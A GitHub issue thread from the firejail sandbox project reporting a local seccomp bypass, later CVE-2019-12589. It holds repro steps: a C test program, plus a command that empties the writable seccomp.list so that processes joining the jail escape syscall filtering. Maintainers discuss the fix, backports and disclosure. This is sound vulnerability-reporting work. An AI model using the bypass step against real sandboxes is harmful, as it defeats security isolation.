Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

seccomp bypass when joining existing jail #2718

Closed
apmorton opened this issue May 21, 2019 · 27 comments
Closed

seccomp bypass when joining existing jail #2718

apmorton opened this issue May 21, 2019 · 27 comments
Labels
bug Something isn't working security Security issue

Comments

@apmorton
Copy link
Contributor

seccomp filters are copied into /run/firejail/mnt, and are writable within the jail.

A malicious process can modify files from inside the jail.
Processes that are later joined to the jail will not have seccomp filters applied.

repro steps

compile program to call blacklisted syscall

gcc -xc - <<EOF
#include <stdio.h>
#include <sys/klog.h>

int main(void) {
    printf("calling syslog syscall\n");
    klogctl(1, NULL, 0);
    printf("not killed\n");
}
EOF

create interactive jail session

$ firejail --quiet --name=jail

try to run program inside jail, noting syscall is blocked

$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall

back in original interactive jail session, empty the seccomp.list file and attempt to run program, noting syscall is blocked

$ echo -n "" > /run/firejail/mnt/seccomp.list
$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is NOT blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall
not killed
@chiraag-nataraj
Copy link
Collaborator

chiraag-nataraj commented May 21, 2019

echo -n "" > /run/firejail/mnt/seccomp.list

This fails for me with bash: /run/firejail/mnt/seccomp.list: Permission denied. Let me play around a bit, since idk if it's only a "my system" thing.

Which version of firejail are you running? Which distro?

@chiraag-nataraj
Copy link
Collaborator

Okay, so I can replicate with current release, but not with current git master. Is that the same for you @apmorton?

@apmorton
Copy link
Contributor Author

confirmed, this is fixed on latest master.

seccomp files are put in /run/firejail/mnt/seccomp and is mounted as a read-only filesystem, which mitigates the issue.

@chiraag-nataraj
Copy link
Collaborator

In the future, if you think you have found a security vulnerability (which this certainly would qualify as), you should probably follow the directions in the readme (i.e. email netblue30).

@chiraag-nataraj
Copy link
Collaborator

@netblue30, this is fixed in git master, but apparently is an issue in the current release. How should we proceed?

@apmorton
Copy link
Contributor Author

apmorton commented May 21, 2019

neither readme (README or README.md) have security disclosure procedures

edit: just noticed in CONTRIBUTING.md, apologies

@chiraag-nataraj
Copy link
Collaborator

I'll add it to the README as well, since people might not think to look at CONTRIBUTING.

@chiraag-nataraj
Copy link
Collaborator

@apmorton, if you're comfortable, can you bisect the commits to figure out which one solved this? We should probably back-port just that fix...

@smitsohu
Copy link
Collaborator

It is commit eecf35c

@chiraag-nataraj
Copy link
Collaborator

Thanks @smitsohu! Should we back-port to LTS and current release?

@smitsohu
Copy link
Collaborator

@chiraag-nataraj We already have a new release candidate, and 0.9.58 will be replaced very soon anyways.

LTS is a different story, imho it should be backported. What does @startx2017 think?

@SkewedZeppelin
Copy link
Collaborator

SkewedZeppelin commented May 22, 2019

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@smitsohu
Copy link
Collaborator

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@netblue30 ?

@SkewedZeppelin
Copy link
Collaborator

SkewedZeppelin commented May 22, 2019

this fine?

Subject: local seccomp bypass in firejail before 0.9.60-rc1

Austin Morton has discovered a local method to bypass/disable seccomp
filters of a firejail sandbox.

Versions of firejail before 0.9.60-rc1 or eecf35c2 do not mark seccomp
files read-only which allows overwriting them, once overwritten any
processes joined to the existing sandbox will not have seccomp enforced.
This can allow for a denial of service or elevation of privileges.

Reported here:
https://github.com/netblue30/firejail/issues/2718

Fixed in this commit:
https://github.com/netblue30/firejail/commit/eecf35c2

Compile tested backports for LTS, 0.9.52, 0.9.54, 0.9.56, and 0.9.58.2 are
available here:
https://github.com/netblue30/firejail/issues/2718#issuecomment-495010478

@smitsohu
Copy link
Collaborator

Pending backport to LTS and other versions.

More a side note: So far we as upstream only support the last version and LTS, and I tend to believe this is a wise decision. I'd say for earlier versions it is the maintainers job to backport fixes, in line with their respective distribution policy.

@SkewedZeppelin
Copy link
Collaborator

SkewedZeppelin commented May 22, 2019

@smitsohu
okay updated, would you like to send it to the oss-security list?

@SkewedZeppelin
Copy link
Collaborator

SkewedZeppelin commented May 22, 2019

I have done some backports here
https://gist.github.com/SkewedZeppelin/7f67a131a3d31bfa9d64eaf1a72b1971

edit: attached as a zip for archival purposes
eecf35c-backports.zip

@smitsohu
Copy link
Collaborator

smitsohu commented May 23, 2019

asked MITRE for a CVE number

@netblue30 netblue30 added the bug Something isn't working label May 26, 2019
@netblue30
Copy link
Owner

Thanks @apmorton

New release Monday morning. If you want to bring in any other fix, now is the time. If we don't get a CVE number by Monday, we'll add it later. I'll grab the patch from @SkewedZeppelin and add it in etc-fixes directory here on mainline. For LTS a new release probably sometime next week, there are some more fixes to be added there, I'll have to tak to @startx2017 .

@rusty-snake
Copy link
Collaborator

The RELNOTES should be updated, we have some new stuff like private-cwd or deterministic-exit-code and so on.

@netblue30
Copy link
Owner

RELNOTES done, anything missing just add it in. I'm doing some testing right now, tonight or tomorrow morning it should be out.

@reinerh
Copy link
Collaborator

reinerh commented May 30, 2019

@smitsohu Was there already a reply regarding CVE number?

Edit: Did you use this form? https://cveform.mitre.org/

@smitsohu
Copy link
Collaborator

@reinerh We have no number assigned yet.

Yes, I used the webform. I think I'm going to ask if there is something we can do on our end to speed up the process.

@netblue30
Copy link
Owner

@startx2017 started porting, we will have a LTS release by the end of the week with or without CVE.

@reinerh
Copy link
Collaborator

reinerh commented May 30, 2019

(FYI a backported fix is in Debian unstable since yesterday, together with a fix for #2401; and it has been unblocked for migration to Buster.)

@reinerh reinerh added the security Security issue label May 31, 2019
@carnil
Copy link

carnil commented Jun 3, 2019

CVE-2019-12589 was assigned for this issue.

@netblue30
Copy link
Owner

LTS version also released, CVE status page updated - https://firejail.wordpress.com/download-2/cve-status/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working security Security issue
Projects
None yet
Development

No branches or pull requests

8 participants